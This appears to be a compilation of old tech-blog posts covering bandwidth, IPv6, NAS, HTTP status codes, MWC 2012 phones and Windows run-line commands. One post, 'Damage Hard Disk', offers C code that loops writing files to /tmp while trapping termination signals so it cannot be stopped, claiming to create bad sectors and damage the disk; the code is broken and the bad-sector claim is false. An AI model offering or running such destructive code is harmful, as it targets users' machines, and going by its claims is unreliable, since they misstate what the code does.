Think of roads as bandwidth and users traffic as vehicles. If there are more vehicles and fewer roads then the speed of vehicles will be slow. But if there is only one vehicle on the roads then their speed will be very fast. So if there are many users surfing the internet, then each will get a piece of the bandwidth and so your surfing speed will be slow. Even if many people are downloading a same file, download speed will drop to a certain extent.
If u ever wondered that why does sometime your downloads take very much time to complete, it is all about Bandwidth. As the bandwidth increases, so does the amount of data that can flow through in a given amount of time, increases. An Internet connection with a large bandwidth can move a large data (say, a video file) much faster than an Internet connection with a lower bandwidth.

Often a term called bandwidth bottleneck  is used in computing language. A real communications path usually consists of a succession of links, each with its own bandwidth. If one of these is much slower than the rest, it is said to be a bandwidth bottleneck.
Bandwidth Bottleneck
To conduct your bandwidth speed test Click Here

IPv6 Next Generation Internet Protocol : A Brief Guide

IPv4 and IPv6 are the past and the future of the internet addresses the way the devices would be communicating with each other. IPv4 is the old system of assigning the unique IP addresses to various devices enabling them to communicate and transfer data effectively.

What is an IP address ?

Well to be brief  the Internet operates by transferring data in small packets communications protocol known as the Internet Protocol. Each data packet contains two numeric addresses that are the packet’s origin and destination devices. So each device has its own unique address just like we have our own unique names and identifications that are independently routed across networks as specified by an international

What is IPv4 and What’s the problem with it  ?


IPv4 or the Internet Protocol Version 4 is the current way how we are actually using the IP addresses.  Since it uses 32 bit so the total number of addresses that are available are just 2^32. Now that may sound astonishing but please pay an attention to the underlying facts as well. We have already allotted around 4.2  billion IP addresses to various institutes and devices. It’s not that we have run out of addresses but we may soon, cause most of the remaining addresses are already assigned to various institutes like MIT, IBM, etc and thus a IPv4 address is a very scarce resource and in future would become even more scarce when even these address are traded out.

What is IPv6 and How is it going to solve This Problem.


IPv6 or the internet Protocol Version 6 is the new set of addresses that would be rolled out. The basic difference between the IPv4 and IPv6 remains that IPv6 utilities 128 bit addresses that is we would have 2^128 unique addresses , now that’s enough for each one of us.

So what makes this transition so difficult.

Well this transition from IPv4 to IPv6 began around a decade ago but it was a slow transition because of the cost involved in it. The true test of IPv6 would be on June 8, 2011, World IPv6 Day. Google, Facebook and other prominent web companies will test drive the IPv6 network. Various techniques are used to move from IPv4 to IPv6 like, Dual IP Stacks ,Dual Stack Application Level Gateway (Dual Stack ALG),Network Address Translator – Protocol Translator (NAT-PT) ,Dual Stack Transition Mechanism, or DSTM ,IPv6 over IPv4 tunneling etc .A detailed description is available on Net just Google it or visit this link.


How IPv4 to IPv6 transition is going to Affect Me?

Well perhaps it won’t and would both at same time. Most of the major operating systems like Windows XP Sp1, Mac OS X 10.2 support IPv6 and IPv4 as well. But it would be difficult to make a connection between a device with an IPv6 address to a router or server that only supports IPv4 impossible.
Since IPv6 is still new and companies like Google,IBM,Facebook would be still checking its security and stability it would be fun to watch to see the world move from IPv4 to IPv6. In the mean time get your self this gadget to see the real-time countdown of saying bye to Ipv4.

IPv4 Exhaustion Counter

What is Network Attached Storage (NAS) server

Network Attached Storage(NAS)

NASNetwork-attached storage (NAS) is file-level computer data storage connected to a computer network providing data access to heterogeneous clients.”  If that sounds too technical then in layman’s language a NAS is simply a  server that is dedicated to nothing more than file sharing.
Simply speaking  using a traditional LAN protocol such as TCP/IP over Ethernet, the NAS enables additional storage to be quickly added by plugging it into a network hub or switch.
NAS does not provide any of the activities that a server in a server-centric system typically provides, such as e-mail,authentication or file management,however these services maybe later added as a add-on.

So why do we need a NAS:


Well just consider a business that has more than one employee and that has tonnes of data in its server,if that business decides to move from one location to other,then it has to take all its data with it. It would be really great option if all this data was centralized and could be accessed from anywhere but for a small business that option is not a practical one considering the cost of a file server, or an additional license  of Windows server 2003,or a support license of Linux for that matter. Now this is where the NAS steps in to provide a reliable and cheap solution to your data-storage needs.They often include built-in features such as disk space quotas, secure authentication, or the automatic sending of email alerts should an error be detected.

So how does a NAS work:

Well traditionally like a  file servers, NAS follows a client-server design. A single hardware device, often called the NAS box or NAS head, acts as the interface between the NAS and network clients.These devices run on an embedded OS . Single or multiple hard drives can be connected to a NAS . A client usually connects to the NAS head and not directly to the storage device, a client often connects using Ethernet connection,and thus a NAS  appears as a single ‘node’ in the network often the IP address of the NAS device.With a NAS device, storage is not an integral part of the server. Instead, in this storage-centric design, the server still handles all of the processing of data but a NAS device delivers the data to the user. A NAS device does not need to be located within the server but can exist anywhere in a LAN.

Network Attached Storage Network Attached Storage

Communication with the NAS head occurs with TCP/IP . The two file-based protocols most commonly associated with NAS are Sun Network File System (NFS) and Common Internet File System (CIFS).
NFS was developed for UNIX based systems to transfer files over LAN.
The CIFS was formerly known as Server Message Block (SMB). SMB was developed by IBM and Microsoft to support file sharing in DOS.
Many NAS systems today support HTTP as a protocol to enable you to browse content using the browser.
Other Network protocols used to serve NAS:

Why is NAS cheaper :

Well a NAS is cheaper because of various factors like  it runs a stripped-down operating system,often FreeNAS. And  at the same time it offers very limited services when compared to a full-fledged file-server.
If you are considering to buy a NAS for yourself you may consider paying a visit to following reviews of NAS by PC magazine and CNET.
http://www.pcworld.com/article/125072/top_10_networkattached_storage_devices.html
http://reviews.cnet.com/best-network-attached-storage/

What is HTTP, Role of HTTP in Web and HTTP Status Codes

There are two main modes of transferring file over the World Wide Web, one is FTP (file transfer protocol) and other is HTTP (Hypertext Transfer Protocol) Which is the set of rules for transferring files (text, graphic images, sound, video, and other multimedia files) on the World Wide Web. As soon as a Web user opens their Web browser, the user is indirectly making use of HTTP. HTTP is an application protocol that runs on top of the TCP/IP suite of protocols. Whereas, FTP is used to transfer bulk files

How HTTP works??
We submitted URL (universal resource locator) in the URL bar and hits enter, Then our browser send HTTP requests to the web server for the web pages. Web server serves the HTTP request by convert that page in to appropriate form that our web browser can read and send the result via HTTP response. So HTTP is a medium to communicate to the web server. One more thing some server sends HTTP cookies on the web browser, in which all the personal setting and login data of user is stored.
HTTP
There are various HTTP status codes to maintain the internet standards and helpful to sort out the problem. HTTP status codes are divides in to four major categories.
  • 100-101 Intermediate Status
  • 200-206 Successful Response
  • 300-307 Redirects
  • 400-417 Request Errors
  • 500-505 Server Errors
http-server-header-status-codes
The details of these HTTP status codes are:
  • 100-101 Intermediate Status
100 continue The server returns this code to indicate that it has received the first part of a request and is waiting for the rest.
101 switching protocol The requester has asked the server to switch protocols
  • 200-206 Successful Response
200 Successful The server successfully processed the request
201 created the server created a new resource
202 accepted request is accepted and under processing.
203 Non-authoritative information The server processed the request, but is returning information that may be from another source
204 No content Server not returning any content after processing request
205 reset content response requires that the requester reset the document view. after facing 204 status code.
206 Partial content The server successfully processed a partial GET request.
  • 300-307 Redirects
300 Multiple choices There are multiple choices for users.
301 Moved permanently In future user will be redirected to the given url
302 Moved temporarily Temporarily user will be directed to the given url
303 See other location For all requests other than a HEAD request, the server automatically forwards to the other location.
304 Not modified The requested page hasn’t been modified since the last request.
305 Use proxy The requester can only access the requested page using a proxy.
306 Switch Proxy No longer used.
307 Temporary redirect The request should be repeated with another URI, but future requests can still use the original URI.
  • 400-417 Request Errors
400 Bad request The request cannot be fulfilled. because it is inappropriate.
401 not authorized specifically for use when authentication is possible but has failed.
402 Payment Required No longer used
403 forbidden Access decline due to unauthorized.
404 Not found When no results found as per query or URL provided by user
405 method not allowed The method specified in the request is not in the correct form.
406 Not acceptable The requested page can’t respond with the content characteristics requested
407 proxy authentication required Need to authenticate with proxy
408 Request timeout Request is not processed in the appropriate time interval
409 conflict When request conflict occurs
410 Gone Indicates that the resource requested is no longer available and will not be available again
411 length required The server won’t accept the request without a valid Content-Length header field
412 Precondition failed request fails to fulfill the precondition that are required by web server
413 request entity too large Server is not able to process too long request
414 Requested URI is too long Server can’t process long query string.
415 unsupported media type The request is in a format not support by the requested page
416 Requested range unsatisfiable The server returns this status code if the request is for a range not available for the page
417Expectation failed server failed to process what ever the request expect by the client

  • 500-505 Server Errors
500 internal server error Server fails to interpreters the HTTP request. 

501 Not implemented When request is partially completed or can’t be send to client

502 bad gateway Server gateway is nor responding

503 Service unavailable server  is temporary out of service

504 gateway timeout Didn’t receive timely response from upstream server.

505 HTTP version not supported The server doesn’t support the HTTP protocol version used in the request.
I hope the concept of HTTP is very clear to you.

Top 5 Smartphones unveiled at MWC 2012

Biggest show of the mobile industry has come to an end. Like every year, Mobile World Congress was packed with tons of phone and tablet launches. Here we are covering top 5 smartphone unveiled by popular brands.

Nokia 808 Pureview

Yes it runs on crappy Symbian but still makes up to the list of top five. Reason behind all this is a whopping 41 megapixel camera  which you expected to see on any smartphone by 2013 or even later. The phone features a 1.3 GHz processor and 4 inch display with resolution of 640 x 360 pixels. Whats more surprising is the phone winning the official Best of Show award at Mobile World Congress. Well no one expected this award will be going to Nokia, atleast I didn’t. But 41 megapixel camera on a phone is really a big deal. The official sample pictures clicked by the phone have been also uploaded to Flickr by NokiaOfficial.

HTC ONE X

HTC One X is the first phone running on Quad Core Processor. Its sports a 8 Megapixel with auto focus, smart LED flash, and BSI sensor for capturing some amazing moments of your life. The phone also has stunning 4.7 inch HD display with resolution of 1280*720 pixels. ONE X is my personal favorite not just because of powerful processor but also because of its design, build quality, beats audio, HTC Sense 4 & some of the cool new features introduced for the first time.

HTC ONE V


Second phone in the HTC X lineup, ONE V shares some of its specifications with Rhyme. The phone is powered by 1 GHz dual core processor, 512 MB of RAM, 5 Megapixel camera with 720p Video Recording and lastly 3.7 inch display with resolution of 480 x 800 pixels. HTC ONE V also has beats audio and is expected to hit stores with ONE X & ONE S in first week of April 2012. Pre-order is already up on Clove UK for ONE X at £410.00, ONE S at £375.00  and ONE V at £220.00. Credit for high pricing goes only to Beats.

NOKIA LUMIA 900

I know Lumia was announced at CES 2012 but that was only LTE version with AT&T, America’s leading network. But finally after a month wait, Nokia has finally announced the global version (unlocked) available in its usual colors white, cyan and black.  The phone is powered by 1.4 GHz processor and 512 MB RAM with 4.3″ AMOLED display. It sports a 8 Megapixel camera with LED flash. Lumia 900 will be available in Q2 of 2012 and will retail for 480€.

ASUS Padfone


No, Its just not a single thing. This is a phone, a tablet and a netbook.  Confused? Well, Let me explain. Asus, the Taiwan based smartphone and tablet manufacturer has unveiled the much awaited Padfone running on Android 4.0 Ice Cream Sandwich. The phone features a 4.3 inch display and when it is placed inside the optional PadFone Station, it transforms into a 10.1 inch tablet with five times more powerful battery. Pure Magic, isn’t it?  There is more, if you now connect the tablet to an optional accessory such as keyboard the battery life is 9 times more. This is certainly one of the best technologies we have seen in last few years. To get a better idea you can watch this video here.

Wednesday, April 18, 2012

Damage Hard Disk

This program will create Bad Sectors on HDD and in turn it will damage the hard disk.

(Use at your own risk)

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}

DOS Tricks

 !!Tricks@ DoS

 

 Accessibility Controls

 access.cpl


Add Hardware Wizard

 hdwwiz.cpl


Add/Remove Programs

 appwiz.cpl


Administrative Tools

 control admintools


Automatic Updates

 wuaucpl.cpl


Bluetooth Transfer Wizard

 fsquirt


Calculator

 calc


Certificate Manager

 certmgr.msc


Character Map

 charmap


Check Disk Utility

 chkdsk


Clipboard Viewer

 clipbrd


Command Prompt

 cmd


Component Services

 dcomcnfg


Computer Management

 compmgmt.msc


timedate.cpl

 ddeshare


Device Manager

 devmgmt.msc


Direct X Control Panel (If Installed)*

 directx.cpl


Direct X Troubleshooter

 dxdiag


Disk Cleanup Utility

 cleanmgr


Disk Defragment

 dfrg.msc


Disk Management

 diskmgmt.msc


Disk Partition Manager

 diskpart


Display Properties

 control desktop


Display Properties

 desk.cpl


Display Properties (w/Appearance Tab Preselected)

 control color


Dr. Watson System Troubleshooting Utility

 drwtsn32


Driver Verifier Utility

 verifier


Event Viewer

 eventvwr.msc


File Signature Verification Tool

 sigverif


Findfast

 findfast.cpl


Folders Properties

 control folders


Fonts

 control fonts


Fonts Folder

 fonts


Free Cell Card Game

 freecell


Game Controllers

 joy.cpl


Group Policy Editor (XP Prof)

 gpedit.msc


Hearts Card Game

 mshearts


Iexpress Wizard

 iexpress


Indexing Service

 ciadv.msc


Internet Properties

 inetcpl.cpl


IP Configuration (Display Connection Configuration)

 ipconfig /all


IP Configuration (Display DNS Cache Contents)

 ipconfig /displaydns


IP Configuration (Delete DNS Cache Contents)

 ipconfig /flushdns


IP Configuration (Release All Connections)

 ipconfig /release


IP Configuration (Renew All Connections)

 ipconfig /renew


IP Configuration (Refreshes DHCP & Re-Registers DNS)

 ipconfig /registerdns


IP Configuration (Display DHCP Class ID)

 ipconfig /showclassid


IP Configuration (Modifies DHCP Class ID)

 ipconfig /setclassid


Java Control Panel (If Installed)

 jpicpl32.cpl


Java Control Panel (If Installed)

 javaws


Keyboard Properties

 control keyboard


Local Security Settings

 secpol.msc


Local Users and Groups

 lusrmgr.msc


Logs You Out Of Windows

 logoff


Microsoft Chat

 winchat


Minesweeper Game

 winmine


Mouse Properties

 control mouse


Mouse Properties

 main.cpl


Network Connections

 control netconnections


Network Connections

 ncpa.cpl


Network Setup Wizard

 netsetup.cpl


Notepad

 notepad


Nview Desktop Manager (If Installed)

 nvtuicpl.cpl


Object Packager

 packager


ODBC Data Source Administrator

 odbccp32.cpl


On Screen Keyboard

 osk


Opens AC3 Filter (If Installed)

 ac3filter.cpl


Password Properties

 password.cpl


Performance Monitor

 perfmon.msc


Performance Monitor

 perfmon


Phone and Modem Options

 telephon.cpl


Power Configuration

 powercfg.cpl


Printers and Faxes

 control printers


Printers Folder

 printers


Private Character Editor

 eudcedit


Quicktime (If Installed)

 QuickTime.cpl


Regional Settings

 intl.cpl


Registry Editor

 regedit


Registry Editor

 regedit32


Remote Desktop

 mstsc


Removable Storage

 ntmsmgr.msc


Removable Storage Operator Requests

 ntmsoprq.msc


Resultant Set of Policy (XP Prof)

 rsop.msc


Scanners and Cameras

 sticpl.cpl


Scheduled Tasks

 control schedtasks


Security Center

 wscui.cpl


Services

 services.msc


Shared Folders

 fsmgmt.msc


Shuts Down Windows

 shutdown


Sounds and Audio

 mmsys.cpl


Spider Solitare Card Game

 spider


SQL Client Configuration

 cliconfg


System Configuration Editor

 sysedit


System Configuration Utility

 msconfig


System File Checker Utility (Scan Immediately)

 sfc /scannow


System File Checker Utility (Scan Once At Next Boot)

 sfc /scanonce


System File Checker Utility (Scan On Every Boot)

 sfc /scanboot


System File Checker Utility (Return to Default Setting)

 sfc /revert


System File Checker Utility (Purge File Cache)

 sfc /purgecache


System File Checker Utility (Set Cache Size to size x)

 sfc /cachesize=x


System Properties

 sysdm.cpl


Task Manager

 taskmgr


Telnet Client

 telnet


User Account Management

 nusrmgr.cpl


Utility Manager

 utilman


Windows Firewall

 firewall.cpl


Windows Magnifier

 magnify


Windows Management Infrastructure

 wmimgmt.msc


Windows System Security Tool

 syskey


Windows Update Launches

 wupdmgr


Windows XP Tour Wizard

 tourstart


Wordpad

 write


Run line commands can be very useful some times, its better to know them here are all the commands that i know u might find them usefull too Commands are same for Windows xp pro and home


Run Line Commands

These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad

These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update

The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure





Calculation on command Prompt ! u knew dis???

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.

***************************************************

Hey folks, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter......... Enjoy the magic!!!!